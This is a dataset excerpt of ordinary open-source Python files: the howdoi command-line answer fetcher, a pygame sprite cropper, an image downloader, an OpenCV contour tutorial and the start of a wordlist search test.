Dataset schema (one row per source file; ⌀ marks nullable columns):

hexsha: string (length 40)
size: int64 (4 – 1.02M)
ext: string (8 classes)
lang: string (1 class)
max_stars_repo_path: string (length 4 – 209)
max_stars_repo_name: string (length 5 – 121)
max_stars_repo_head_hexsha: string (length 40)
max_stars_repo_licenses: list (length 1 – 10)
max_stars_count: int64 (1 – 191k) ⌀
max_stars_repo_stars_event_min_datetime: string (length 24) ⌀
max_stars_repo_stars_event_max_datetime: string (length 24) ⌀
max_issues_repo_path: string (length 4 – 209)
max_issues_repo_name: string (length 5 – 121)
max_issues_repo_head_hexsha: string (length 40)
max_issues_repo_licenses: list (length 1 – 10)
max_issues_count: int64 (1 – 67k) ⌀
max_issues_repo_issues_event_min_datetime: string (length 24) ⌀
max_issues_repo_issues_event_max_datetime: string (length 24) ⌀
max_forks_repo_path: string (length 4 – 209)
max_forks_repo_name: string (length 5 – 121)
max_forks_repo_head_hexsha: string (length 40)
max_forks_repo_licenses: list (length 1 – 10)
max_forks_count: int64 (1 – 105k) ⌀
max_forks_repo_forks_event_min_datetime: string (length 24) ⌀
max_forks_repo_forks_event_max_datetime: string (length 24) ⌀
content: string (length 4 – 1.02M)
avg_line_length: float64 (1.07 – 66.1k)
max_line_length: int64 (4 – 266k)
alphanum_fraction: float64 (0.01 – 1)
hexsha: fbec81afde982744129ed62c3d44a6236c5b5a8e | size: 27,523 | ext: py | lang: Python
max_stars / max_issues / max_forks repo (identical for all three): path = howdoi/howdoi.py | name = benjaminhafen/howdoi | head_hexsha = 875983c9ebdf4a1c9abad7afd63a68a9229e8eed | licenses = ["MIT"]
max_stars_count, max_issues_count, max_forks_count: null | all event datetimes: null

content:
#!/usr/bin/env python
######################################################
#
# howdoi - instant coding answers via the command line
# written by Benjamin Gleitzman (gleitz@mit.edu)
# inspired by Rich Jones (rich@anomos.info)
#
######################################################
import gc
gc.disable()
import argparse
import inspect
import json
import os
import re
import sys
import textwrap
from urllib.request import getproxies
from urllib.parse import quote as url_quote, urlparse, parse_qs
from multiprocessing import Pool
import logging
import appdirs
import requests
from cachelib import FileSystemCache, NullCache
from keep import utils as keep_utils
from pygments import highlight
from pygments.lexers import guess_lexer, get_lexer_by_name
from pygments.formatters.terminal import TerminalFormatter
from pygments.util import ClassNotFound
from pyquery import PyQuery as pq
from requests.exceptions import ConnectionError as RequestsConnectionError
from requests.exceptions import SSLError
from howdoi import __version__
from howdoi.errors import GoogleValidationError, BingValidationError, DDGValidationError
logging.basicConfig(format='%(levelname)s: %(message)s')
if os.getenv('HOWDOI_DISABLE_SSL'): # Set http instead of https
SCHEME = 'http://'
VERIFY_SSL_CERTIFICATE = False
else:
SCHEME = 'https://'
VERIFY_SSL_CERTIFICATE = True
SUPPORTED_SEARCH_ENGINES = ('google', 'bing', 'duckduckgo')
URL = os.getenv('HOWDOI_URL') or 'stackoverflow.com'
USER_AGENTS = ('Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:11.0) Gecko/20100101 Firefox/11.0',
               'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0',
'Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0',
('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) '
'Chrome/19.0.1084.46 Safari/536.5'),
               ('Mozilla/5.0 (Windows; Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 '
'Safari/536.5'),)
SEARCH_URLS = {
'bing': SCHEME + 'www.bing.com/search?q=site:{0}%20{1}&hl=en',
'google': SCHEME + 'www.google.com/search?q=site:{0}%20{1}&hl=en',
'duckduckgo': SCHEME + 'duckduckgo.com/html?q=site:{0}%20{1}&t=hj&ia=web'
}
BLOCK_INDICATORS = (
'form id="captcha-form"',
'This page appears when Google automatically detects requests coming from your computer '
'network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service'
)
BLOCKED_QUESTION_FRAGMENTS = (
'webcache.googleusercontent.com',
)
STAR_HEADER = '\u2605'
ANSWER_HEADER = '{2} Answer from {0} {2}\n{1}'
NO_ANSWER_MSG = '< no answer given >'
CACHE_EMPTY_VAL = "NULL"
CACHE_DIR = appdirs.user_cache_dir('howdoi')
CACHE_ENTRY_MAX = 128
HTML_CACHE_PATH = 'page_cache'
SUPPORTED_HELP_QUERIES = ['use howdoi', 'howdoi', 'run howdoi', 'setup howdoi',
'do howdoi', 'howdoi howdoi', 'howdoi use howdoi']
# ANSI escape codes for text formatting; prepend to a string to begin formatting.
BOLD = '\033[1m'
GREEN = '\033[92m'
RED = '\033[91m'
UNDERLINE = '\033[4m'
END_FORMAT = '\033[0m' # append to string to end text formatting.
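# e.g. f'{BOLD}{GREEN}Done{END_FORMAT}' renders "Done" in bold green on ANSI-capable terminals.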
# stash options
STASH_SAVE = 'save'
STASH_VIEW = 'view'
STASH_REMOVE = 'remove'
STASH_EMPTY = 'empty'
BLOCKED_ENGINES = []
if os.getenv('HOWDOI_DISABLE_CACHE'):
# works like an always empty cache
cache = NullCache()
else:
cache = FileSystemCache(CACHE_DIR, CACHE_ENTRY_MAX, default_timeout=0)
howdoi_session = requests.session()
class BlockError(RuntimeError):
pass
class IntRange:
def __init__(self, imin=None, imax=None):
self.imin = imin
self.imax = imax
def __call__(self, arg):
try:
value = int(arg)
except ValueError as value_error:
raise self.exception() from value_error
if (self.imin is not None and value < self.imin) or (self.imax is not None and value > self.imax):
raise self.exception()
return value
def exception(self):
if self.imin is not None and self.imax is not None:
return argparse.ArgumentTypeError(f'Must be an integer in the range [{self.imin}, {self.imax}]')
if self.imin is not None:
return argparse.ArgumentTypeError(f'Must be an integer >= {self.imin}')
if self.imax is not None:
return argparse.ArgumentTypeError(f'Must be an integer <= {self.imax}')
return argparse.ArgumentTypeError('Must be an integer')
def _random_int(width):
bres = os.urandom(width)
if sys.version < '3':
ires = int(bres.encode('hex'), 16)
else:
ires = int.from_bytes(bres, 'little')
return ires
def _random_choice(seq):
return seq[_random_int(1) % len(seq)]
def get_proxies():
proxies = getproxies()
filtered_proxies = {}
for key, value in proxies.items():
if key.startswith('http'):
if not value.startswith('http'):
filtered_proxies[key] = 'http://%s' % value
else:
filtered_proxies[key] = value
return filtered_proxies
def _format_url_to_filename(url, file_ext='html'):
filename = ''.join(ch for ch in url if ch.isalnum())
return filename + '.' + file_ext
def _get_result(url):
try:
resp = howdoi_session.get(url, headers={'User-Agent': _random_choice(USER_AGENTS)},
proxies=get_proxies(),
verify=VERIFY_SSL_CERTIFICATE,
cookies={'CONSENT': 'YES+US.en+20170717-00-0'})
resp.raise_for_status()
return resp.text
except requests.exceptions.SSLError as error:
logging.error('%sEncountered an SSL Error. Try using HTTP instead of '
'HTTPS by setting the environment variable "HOWDOI_DISABLE_SSL".\n%s', RED, END_FORMAT)
raise error
def _get_from_cache(cache_key):
    # As of cachelib 0.3.0, a cache miss internally logs a warning
current_log_level = logging.getLogger().getEffectiveLevel()
# Reduce the log level so the warning is not printed
logging.getLogger().setLevel(logging.ERROR)
page = cache.get(cache_key) # pylint: disable=assignment-from-none
# Restore the log level
logging.getLogger().setLevel(current_log_level)
return page
def _add_links_to_text(element):
hyperlinks = element.find('a')
for hyperlink in hyperlinks:
pquery_object = pq(hyperlink)
href = hyperlink.attrib['href']
copy = pquery_object.text()
if copy == href:
replacement = copy
else:
replacement = f'[{copy}]({href})'
pquery_object.replace_with(replacement)
def get_text(element):
''' return inner text in pyquery element '''
_add_links_to_text(element)
try:
return element.text(squash_space=False)
except TypeError:
return element.text()
def _extract_links_from_bing(html):
html.remove_namespaces()
return [a.attrib['href'] for a in html('.b_algo')('h2')('a')]
def _clean_google_link(link):
if '/url?' in link:
parsed_link = urlparse(link)
query_params = parse_qs(parsed_link.query)
url_params = query_params.get('q', []) or query_params.get('url', [])
if url_params:
return url_params[0]
return link
def _extract_links_from_google(query_object):
html = query_object.html()
link_pattern = re.compile(fr"https?://{URL}/questions/[0-9]*/[a-z0-9-]*")
links = link_pattern.findall(html)
links = [_clean_google_link(link) for link in links]
return links
def _extract_links_from_duckduckgo(html):
html.remove_namespaces()
links_anchors = html.find('a.result__a')
results = []
for anchor in links_anchors:
link = anchor.attrib['href']
url_obj = urlparse(link)
parsed_url = parse_qs(url_obj.query).get('uddg', '')
if parsed_url:
results.append(parsed_url[0])
return results
def _extract_links(html, search_engine):
if search_engine == 'bing':
return _extract_links_from_bing(html)
if search_engine == 'duckduckgo':
return _extract_links_from_duckduckgo(html)
return _extract_links_from_google(html)
def _get_search_url(search_engine):
return SEARCH_URLS.get(search_engine, SEARCH_URLS['google'])
def _is_blocked(page):
for indicator in BLOCK_INDICATORS:
if page.find(indicator) != -1:
return True
return False
def _get_links(query):
search_engine = os.getenv('HOWDOI_SEARCH_ENGINE', 'google')
search_url = _get_search_url(search_engine).format(URL, url_quote(query))
logging.info('Searching %s with URL: %s', search_engine, search_url)
try:
result = _get_result(search_url)
except requests.HTTPError:
logging.info('Received HTTPError')
result = None
if not result or _is_blocked(result):
logging.error('%sUnable to find an answer because the search engine temporarily blocked the request. '
'Attempting to use a different search engine.%s', RED, END_FORMAT)
raise BlockError('Temporary block by search engine')
html = pq(result)
links = _extract_links(html, search_engine)
if len(links) == 0:
logging.info('Search engine %s found no StackOverflow links, returned HTML is:', search_engine)
logging.info(result)
return list(dict.fromkeys(links)) # remove any duplicates
def get_link_at_pos(links, position):
if not links:
return False
if len(links) >= position:
link = links[position - 1]
else:
link = links[-1]
return link
def _format_output(args, code):
if not args['color']:
return code
lexer = None
# try to find a lexer using the StackOverflow tags
# or the query arguments
for keyword in args['query'].split() + args['tags']:
try:
lexer = get_lexer_by_name(keyword)
break
except ClassNotFound:
pass
# no lexer found above, use the guesser
if not lexer:
try:
lexer = guess_lexer(code)
except ClassNotFound:
return code
return highlight(code,
lexer,
TerminalFormatter(bg='dark'))
def _is_question(link):
for fragment in BLOCKED_QUESTION_FRAGMENTS:
if fragment in link:
return False
return re.search(r'questions/\d+/', link)
def _get_questions(links):
return [link for link in links if _is_question(link)]
def _get_answer(args, link): # pylint: disable=too-many-branches
cache_key = _get_cache_key(link)
page = _get_from_cache(cache_key)
if not page:
logging.info('Fetching page: %s', link)
page = _get_result(link + '?answertab=votes')
cache.set(cache_key, page)
else:
logging.info('Using cached page: %s', link)
html = pq(page)
first_answer = html('.answercell').eq(0) or html('.answer').eq(0)
instructions = first_answer.find('pre') or first_answer.find('code')
args['tags'] = [t.text for t in html('.post-tag')]
    # decide which class contains the answer body
if first_answer.find(".js-post-body"):
answer_body_cls = ".js-post-body"
else:
        # fall back to the post-text class
answer_body_cls = ".post-text"
if not instructions and not args['all']:
logging.info('No code sample found, returning entire answer')
text = get_text(first_answer.find(answer_body_cls).eq(0))
elif args['all']:
logging.info('Returning entire answer')
texts = []
for html_tag in first_answer.items(f'{answer_body_cls} > *'):
current_text = get_text(html_tag)
if current_text:
if html_tag[0].tag in ['pre', 'code']:
texts.append(_format_output(args, current_text))
else:
texts.append(current_text)
text = '\n'.join(texts)
else:
text = _format_output(args, get_text(instructions.eq(0)))
if text is None:
logging.info('%sAnswer was empty%s', RED, END_FORMAT)
text = NO_ANSWER_MSG
text = text.strip()
return text
def _get_links_with_cache(query):
cache_key = _get_cache_key(query)
res = _get_from_cache(cache_key)
if res:
logging.info('Using cached links')
if res == CACHE_EMPTY_VAL:
logging.info('No StackOverflow links found in cached search engine results - will make live query')
else:
return res
links = _get_links(query)
if not links:
cache.set(cache_key, CACHE_EMPTY_VAL)
question_links = _get_questions(links)
cache.set(cache_key, question_links or CACHE_EMPTY_VAL)
return question_links
def build_splitter(splitter_character='=', splitter_length=80):
return '\n' + splitter_character * splitter_length + '\n\n'
def _get_answers(args):
"""
@args: command-line arguments
returns: array of answers and their respective metadata
False if unable to get answers
"""
question_links = _get_links_with_cache(args['query'])
if not question_links:
return False
initial_pos = args['pos'] - 1
final_pos = initial_pos + args['num_answers']
question_links = question_links[initial_pos:final_pos]
search_engine = os.getenv('HOWDOI_SEARCH_ENGINE', 'google')
logging.info('%s links found on %s: %s', URL, search_engine, len(question_links))
logging.info('Answers requested: %s, Starting at position: %s', args["num_answers"], args['pos'])
with Pool() as pool:
answers = pool.starmap(
_get_answer_worker,
[(args, link) for link in question_links]
)
for idx, _ in enumerate(answers):
answers[idx]['position'] = idx + 1
logging.info('Total answers returned: %s', len(answers))
return answers
def _get_answer_worker(args, link):
answer = _get_answer(args, link)
result = {
'answer': None,
'link': None,
'position': None
}
multiple_answers = (args['num_answers'] > 1 or args['all'])
if not answer:
return result
if not args['link'] and not args['json_output'] and multiple_answers:
answer = ANSWER_HEADER.format(link, answer, STAR_HEADER)
answer += '\n'
result['answer'] = answer
result['link'] = link
return result
def _clear_cache():
global cache # pylint: disable=global-statement,invalid-name
if not cache:
cache = FileSystemCache(CACHE_DIR, CACHE_ENTRY_MAX, 0)
return cache.clear()
def _is_help_query(query):
return any(query.lower() == help_query for help_query in SUPPORTED_HELP_QUERIES)
def _format_answers(args, res):
if "error" in res:
return f'ERROR: {RED}{res["error"]}{END_FORMAT}'
if args["json_output"]:
return json.dumps(res)
formatted_answers = []
for answer in res:
next_ans = answer["answer"]
if args["link"]: # if we only want links
next_ans = answer["link"]
formatted_answers.append(next_ans)
return build_splitter().join(formatted_answers)
def _get_help_instructions():
instruction_splitter = build_splitter(' ', 60)
query = 'print hello world in python'
instructions = [
'Here are a few popular howdoi commands ',
'>>> howdoi {} (default query)',
'>>> howdoi {} -a (read entire answer)',
'>>> howdoi {} -n [number] (retrieve n number of answers)',
        '>>> howdoi {} -l (display only a link to where the answer is from)',
'>>> howdoi {} -c (Add colors to the output)',
'>>> howdoi {} -e (Specify the search engine you want to use e.g google,bing)'
]
instructions = map(lambda s: s.format(query), instructions)
return instruction_splitter.join(instructions)
def _get_cache_key(args):
frame = inspect.currentframe()
calling_func = inspect.getouterframes(frame)[1].function
return calling_func + str(args) + __version__
def format_stash_item(fields, index=-1):
title = fields['alias']
description = fields['desc']
item_num = index + 1
if index == -1:
return f'{UNDERLINE}{BOLD}$ {title}{END_FORMAT}\n\n{description}\n'
return f'{UNDERLINE}{BOLD}$ [{item_num}] {title}{END_FORMAT}\n\n{description}\n'
def print_stash(stash_list=None):
if not stash_list or len(stash_list) == 0:
stash_list = ['\nSTASH LIST:']
commands = keep_utils.read_commands()
if commands is None or len(commands.items()) == 0:
logging.error('%sNo commands found in stash. '
'Add a command with "howdoi --%s <query>".%s', RED, STASH_SAVE, END_FORMAT)
return
for _, fields in commands.items():
stash_list.append(format_stash_item(fields))
else:
stash_list = [format_stash_item(x['fields'], i) for i, x in enumerate(stash_list)]
print(build_splitter('#').join(stash_list))
def _get_stash_key(args):
stash_args = {}
ignore_keys = [STASH_SAVE, STASH_VIEW, STASH_REMOVE, STASH_EMPTY, 'tags'] # ignore these for stash key
for key in args:
if key not in ignore_keys:
stash_args[key] = args[key]
return str(stash_args)
def _stash_remove(cmd_key, title):
commands = keep_utils.read_commands()
if commands is not None and cmd_key in commands:
keep_utils.remove_command(cmd_key)
print(f'\n{BOLD}{GREEN}"{title}" removed from stash{END_FORMAT}\n')
else:
print(f'\n{BOLD}{RED}"{title}" not found in stash{END_FORMAT}\n')
def _stash_save(cmd_key, title, answer):
try:
keep_utils.save_command(cmd_key, answer, title)
except FileNotFoundError:
os.system('keep init')
keep_utils.save_command(cmd_key, answer, title)
finally:
print_stash()
def _parse_cmd(args, res):
answer = _format_answers(args, res)
cmd_key = _get_stash_key(args)
title = ''.join(args['query'])
if args[STASH_SAVE]:
_stash_save(cmd_key, title, answer)
return ''
if args[STASH_REMOVE]:
_stash_remove(cmd_key, title)
return ''
return answer
def howdoi(raw_query):
if isinstance(raw_query, str): # you can pass either a raw or a parsed query
parser = get_parser()
args = vars(parser.parse_args(raw_query.split(' ')))
else:
args = raw_query
search_engine = args['search_engine'] or os.getenv('HOWDOI_SEARCH_ENGINE') or 'google'
os.environ['HOWDOI_SEARCH_ENGINE'] = search_engine
if search_engine not in SUPPORTED_SEARCH_ENGINES:
supported_search_engines = ', '.join(SUPPORTED_SEARCH_ENGINES)
message = f'Unsupported engine {search_engine}. The supported engines are: {supported_search_engines}'
res = {'error': message}
return _parse_cmd(args, res)
args['query'] = ' '.join(args['query']).replace('?', '')
cache_key = _get_cache_key(args)
if _is_help_query(args['query']):
return _get_help_instructions() + '\n'
res = _get_from_cache(cache_key)
if res:
logging.info('Using cached response (add -C to clear the cache)')
return _parse_cmd(args, res)
logging.info('Fetching answers for query: %s', args["query"])
try:
res = _get_answers(args)
if not res:
message = 'Sorry, couldn\'t find any help with that topic'
if not args['explain']:
message = f'{message} (use --explain to learn why)'
res = {'error': message}
cache.set(cache_key, res)
except (RequestsConnectionError, SSLError):
res = {'error': f'Unable to reach {search_engine}. Do you need to use a proxy?\n'}
except BlockError:
BLOCKED_ENGINES.append(search_engine)
next_engine = next((engine for engine in SUPPORTED_SEARCH_ENGINES if engine not in BLOCKED_ENGINES), None)
if next_engine is None:
res = {'error': 'Unable to get a response from any search engine\n'}
else:
args['search_engine'] = next_engine
args['query'] = args['query'].split()
logging.info('%sRetrying search with %s%s', GREEN, next_engine, END_FORMAT)
return howdoi(args)
return _parse_cmd(args, res)
def get_parser():
parser = argparse.ArgumentParser(description='instant coding answers via the command line',
epilog=textwrap.dedent('''\
environment variable examples:
HOWDOI_COLORIZE=1
HOWDOI_DISABLE_CACHE=1
HOWDOI_DISABLE_SSL=1
HOWDOI_SEARCH_ENGINE=google
HOWDOI_URL=serverfault.com
'''),
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('query', metavar='QUERY', type=str, nargs='*', help='the question to answer')
parser.add_argument('-p', '--pos', help='select answer in specified position (default: 1)',
default=1, type=IntRange(1, 20), metavar='POS')
parser.add_argument('-n', '--num', help='number of answers to return (default: 1)',
dest='num_answers', default=1, type=IntRange(1, 20), metavar='NUM')
parser.add_argument('--num-answers', help=argparse.SUPPRESS)
parser.add_argument('-a', '--all', help='display the full text of the answer', action='store_true')
parser.add_argument('-l', '--link', help='display only the answer link', action='store_true')
parser.add_argument('-c', '--color', help='enable colorized output', action='store_true')
parser.add_argument('-x', '--explain', help='explain how answer was chosen', action='store_true')
parser.add_argument('-C', '--clear-cache', help='clear the cache',
action='store_true')
parser.add_argument('-j', '--json', help='return answers in raw json format', dest='json_output',
action='store_true')
parser.add_argument('--json-output', action='store_true', help=argparse.SUPPRESS)
parser.add_argument('-v', '--version', help='display the current version of howdoi',
action='store_true')
parser.add_argument('-e', '--engine', help='search engine for this query (google, bing, duckduckgo)',
dest='search_engine', nargs="?", metavar='ENGINE')
parser.add_argument('--save', '--stash', help='stash a howdoi answer',
action='store_true')
parser.add_argument('--view', help='view your stash',
action='store_true')
parser.add_argument('--remove', help='remove an entry in your stash',
action='store_true')
parser.add_argument('--empty', help='empty your stash',
action='store_true')
parser.add_argument('--sanity-check', help=argparse.SUPPRESS,
action='store_true')
return parser
def _sanity_check(engine, test_query=None):
parser = get_parser()
if not test_query:
test_query = 'format date bash'
args = vars(parser.parse_args(test_query.split()))
args['search_engine'] = engine
try:
result = howdoi(args)
# Perhaps better to use `-j` and then check for an error message
# rather than trying to enumerate all the error strings
assert "Sorry" not in result and "Unable to" not in result
except AssertionError as exc:
if engine == 'google':
raise GoogleValidationError from exc
if engine == 'bing':
raise BingValidationError from exc
raise DDGValidationError from exc
def prompt_stash_remove(args, stash_list, view_stash=True):
if view_stash:
print_stash(stash_list)
last_index = len(stash_list)
prompt = f'{BOLD}> Select a stash command to remove [1-{last_index}] (0 to cancel): {END_FORMAT}'
user_input = input(prompt)
try:
user_input = int(user_input)
if user_input == 0:
return
if user_input < 1 or user_input > last_index:
logging.error('\n%sInput index is invalid.%s', RED, END_FORMAT)
prompt_stash_remove(args, stash_list, False)
return
cmd = stash_list[user_input - 1]
cmd_key = cmd['command']
cmd_name = cmd['fields']['alias']
_stash_remove(cmd_key, cmd_name)
return
except ValueError:
logging.error('\n%sInvalid input. Must specify index of command.%s', RED, END_FORMAT)
prompt_stash_remove(args, stash_list, False)
return
def perform_sanity_check():
'''Perform sanity check.
Returns exit code for program. An exit code of -1 means a validation error was encountered.
'''
global cache # pylint: disable=global-statement,invalid-name
# Disable cache to avoid cached answers while performing the checks
cache = NullCache()
exit_code = 0
for engine in ['google']: # 'bing' and 'duckduckgo' throw various block errors
print('Checking {}...'.format(engine))
try:
_sanity_check(engine)
except (GoogleValidationError, BingValidationError, DDGValidationError):
logging.error('%s%s query failed%s', RED, engine, END_FORMAT)
exit_code = -1
if exit_code == 0:
print(f'{GREEN}Ok{END_FORMAT}')
return exit_code
def command_line_runner(): # pylint: disable=too-many-return-statements,too-many-branches
parser = get_parser()
args = vars(parser.parse_args())
if args['version']:
print(__version__)
return
if args['explain']:
logging.getLogger().setLevel(logging.INFO)
logging.info('Version: %s', __version__)
if args['sanity_check']:
sys.exit(
perform_sanity_check()
)
if args['clear_cache']:
if _clear_cache():
print(f'{GREEN}Cache cleared successfully{END_FORMAT}')
else:
logging.error('%sClearing cache failed%s', RED, END_FORMAT)
if args[STASH_VIEW]:
print_stash()
return
if args[STASH_EMPTY]:
os.system('keep init')
return
if args[STASH_REMOVE] and len(args['query']) == 0:
commands = keep_utils.read_commands()
if commands is None or len(commands.items()) == 0:
logging.error('%sNo commands found in stash. '
'Add a command with "howdoi --%s <query>".%s', RED, STASH_SAVE, END_FORMAT)
return
stash_list = [{'command': cmd, 'fields': field} for cmd, field in commands.items()]
prompt_stash_remove(args, stash_list)
return
if not args['query']:
parser.print_help()
return
if os.getenv('HOWDOI_COLORIZE'):
args['color'] = True
utf8_result = howdoi(args).encode('utf-8', 'ignore')
if sys.version < '3':
print(utf8_result)
else:
# Write UTF-8 to stdout: https://stackoverflow.com/a/3603160
sys.stdout.buffer.write(utf8_result)
# close the session to release connection
howdoi_session.close()
if __name__ == '__main__':
command_line_runner()
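# Editor's note (not part of the original file): besides the CLI entry point above,
# howdoi() can also be called programmatically with a raw query string, e.g.
#
#     from howdoi.howdoi import howdoi
#     print(howdoi('print hello world in python'))
#
# The string is split on spaces and fed through the same argparse parser the CLI uses.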
avg_line_length: 33.482968 | max_line_length: 114 | alphanum_fraction: 0.63427

hexsha: ea011e19b2599a0908c90f899ef22072c3691713 | size: 719 | ext: py | lang: Python
max_stars / max_issues / max_forks repo (identical for all three): path = Libreria/recorte.py | name = Sannso/GameCG2 | head_hexsha = 426e22541bf670e0767395c30f15d1b6ad6183f3 | licenses = ["CC0-1.0"]
max_stars_count, max_issues_count, max_forks_count: null | all event datetimes: null

content:
import pygame
import configparser
animapersonaje = []
def recortar_imagen(nombre_imagen, ancho_imagen,alto_imagen,fila_):
terreno = pygame.image.load(nombre_imagen)
info = terreno.get_rect()
ancho_pixeles = info[2]
alto_pixeles = info[3]
ancho_patron = ancho_pixeles/ancho_imagen
alto_patron = alto_pixeles/alto_imagen
    # subsurface parameters: x position, y position, crop width (ancho_patron), crop height (alto_patron)
for fila in range(alto_imagen):
animapersonaje.append([])
for col in range(ancho_imagen):
cuadro = terreno.subsurface(ancho_patron*col, alto_patron*fila, ancho_patron, alto_patron)
animapersonaje[fila_].append(cuadro)
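# Editor's usage sketch (not part of the original module). The sprite-sheet file name
# and the 4x4 grid are assumptions for illustration only; note that every sliced frame
# is appended to animapersonaje[fila_], i.e. to index 0 in this example.
if __name__ == "__main__":
    recortar_imagen("personaje.png", 4, 4, 0)
    print(len(animapersonaje[0]), "frames recortados")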
avg_line_length: 29.958333 | max_line_length: 104 | alphanum_fraction: 0.720445

hexsha: 56e22ee1d2812f1881aa3e2ef41f1be3c41d20e3 | size: 420 | ext: py | lang: Python
max_stars / max_issues / max_forks repo (identical for all three): path = utils/image_downloader.py | name = louismeunier/school-disct-bot-v2 | head_hexsha = e6c225e6883b6a820df5f290cae6d5c01edcae46 | licenses = ["MIT"]
max_stars_count, max_issues_count, max_forks_count: null | all event datetimes: null

content:
import requests
import shutil
def download(url,name):
"""
This function was almost ENTIRELY "copied" from
https://towardsdatascience.com/how-to-download-an-image-using-python-38a75cfa21c
"""
r=requests.get(url,stream=True)
if r.status_code==200:
r.raw.decode_content=True
with open(f"utils/resources/images/schedules/{name}.png", "wb") as f:
shutil.copyfileobj(r.raw,f)
return True
else:
return False
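# Editor's usage sketch (not part of the original module). The URL and file name are
# placeholders; the directory utils/resources/images/schedules/ must already exist,
# since download() opens the output file directly.
if __name__ == "__main__":
    ok = download("https://example.com/schedule.png", "example")
    print("saved" if ok else "download failed")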
avg_line_length: 26.25 | max_line_length: 81 | alphanum_fraction: 0.742857

hexsha: 0ae261a4ebe4c6f01f6c6e4cff9c57b1bfde5b6f | size: 94 | ext: py | lang: Python
max_stars / max_issues / max_forks repo (identical for all three): path = samanage/__init__.py | name = rodneymandap/samanage-py | head_hexsha = 9e06b363e2fa43b3e8f92f97aa3975e1f0461a56 | licenses = ["MIT"]
max_stars_count: null | max_issues_count: null | max_forks_count: 1
max_forks_repo_forks_event_min_datetime: 2022-01-25T21:40:48.000Z | max_forks_repo_forks_event_max_datetime: 2022-01-25T21:40:48.000Z | other event datetimes: null

content:
"""
A simple python library to interact with Samanage API.
"""
from .samanage import Samanage
avg_line_length: 18.8 | max_line_length: 54 | alphanum_fraction: 0.755319

hexsha: 0ebab7aa22b7295e680c8a5a13e536e63fd32d87 | size: 2,528 | ext: py | lang: Python
max_stars / max_issues / max_forks repo (identical for all three): path = opencv/sources/samples/python/tutorial_code/ShapeDescriptors/bounding_rotated_ellipses/generalContours_demo2.py | name = vrushank-agrawal/opencv-x64-cmake | head_hexsha = 3f9486510d706c8ac579ac82f5d58f667f948124 | licenses = ["Apache-2.0"]
max_stars_count, max_issues_count, max_forks_count: null | all event datetimes: null

content:
from __future__ import print_function
import cv2 as cv
import numpy as np
import argparse
import random as rng
rng.seed(12345)
def thresh_callback(val):
threshold = val
## [Canny]
# Detect edges using Canny
canny_output = cv.Canny(src_gray, threshold, threshold * 2)
## [Canny]
## [findContours]
# Find contours
contours, _ = cv.findContours(canny_output, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)
## [findContours]
# Find the rotated rectangles and ellipses for each contour
minRect = [None]*len(contours)
minEllipse = [None]*len(contours)
for i, c in enumerate(contours):
minRect[i] = cv.minAreaRect(c)
if c.shape[0] > 5:
minEllipse[i] = cv.fitEllipse(c)
# Draw contours + rotated rects + ellipses
## [zeroMat]
drawing = np.zeros((canny_output.shape[0], canny_output.shape[1], 3), dtype=np.uint8)
## [zeroMat]
## [forContour]
for i, c in enumerate(contours):
color = (rng.randint(0,256), rng.randint(0,256), rng.randint(0,256))
# contour
cv.drawContours(drawing, contours, i, color)
# ellipse
if c.shape[0] > 5:
cv.ellipse(drawing, minEllipse[i], color, 2)
# rotated rectangle
box = cv.boxPoints(minRect[i])
box = np.intp(box) #np.intp: Integer used for indexing (same as C ssize_t; normally either int32 or int64)
cv.drawContours(drawing, [box], 0, color)
## [forContour]
## [showDrawings]
# Show in a window
cv.imshow('Contours', drawing)
## [showDrawings]
## [setup]
# Load source image
parser = argparse.ArgumentParser(description='Code for Creating Bounding rotated boxes and ellipses for contours tutorial.')
parser.add_argument('--input', help='Path to input image.', default='stuff.jpg')
args = parser.parse_args()
src = cv.imread(cv.samples.findFile(args.input))
if src is None:
print('Could not open or find the image:', args.input)
exit(0)
# Convert image to gray and blur it
src_gray = cv.cvtColor(src, cv.COLOR_BGR2GRAY)
src_gray = cv.blur(src_gray, (3,3))
## [setup]
## [createWindow]
# Create Window
source_window = 'Source'
cv.namedWindow(source_window)
cv.imshow(source_window, src)
## [createWindow]
## [trackbar]
max_thresh = 255
thresh = 100 # initial threshold
cv.createTrackbar('Canny Thresh:', source_window, thresh, max_thresh, thresh_callback)
thresh_callback(thresh)
## [trackbar]
cv.waitKey()
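# Editor's note (not part of the original sample): run it as, for example,
#     python generalContours_demo2.py --input stuff.jpg
# where --input may point to any image readable by cv.imread (default: stuff.jpg).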
avg_line_length: 30.457831 | max_line_length: 125 | alphanum_fraction: 0.649525

hexsha: 4562dc3a95851a278fb188725cb2033198ca85c1 | size: 1,885 | ext: py | lang: Python
max_stars / max_issues / max_forks repo (identical for all three): path = tests/test_tools/test_search.py | name = Nazime/wordlistools | head_hexsha = f18fb0dbfa6e4950e090299d99a173ac96514f42 | licenses = ["MIT"]
max_stars_count: 17 | max_stars_repo_stars_event_min_datetime: 2022-02-06T21:23:27.000Z | max_stars_repo_stars_event_max_datetime: 2022-02-07T22:33:40.000Z
max_issues_count: 1 | max_issues_repo_issues_event_min_datetime: 2022-02-06T21:52:30.000Z | max_issues_repo_issues_event_max_datetime: 2022-02-06T21:52:30.000Z
max_forks_count: 2 | max_forks_repo_forks_event_min_datetime: 2022-02-06T21:29:42.000Z | max_forks_repo_forks_event_max_datetime: 2022-02-06T21:31:06.000Z

content:
from wordlistools.helpertest import AsStdinWordlist, AsWordlist, PolyArgument, runtest
from wordlistools.plugins import red
def test_color_false():
# By default color is enabled in cmdline and disabled in API
color_arg_false = PolyArgument(
api_key="color", api_value=False, cmd_args=["--color", "no"]
)
runtest(
"search",
args=("a", AsStdinWordlist(["a", "b"]), color_arg_false),
ret=AsWordlist(["a"]),
)
runtest(
"search",
args=(
"a",
AsStdinWordlist(["alpha", "beta", "gama", "omega"]),
color_arg_false,
),
ret=AsWordlist(["alpha", "beta", "gama", "omega"]),
)
runtest(
"search",
args=("bc", AsStdinWordlist(["abc", "xbc", "eff", "bxc"]), color_arg_false),
ret=AsWordlist(["abc", "xbc"]),
)
# TODO: test multiple wordlist
def test_color_true():
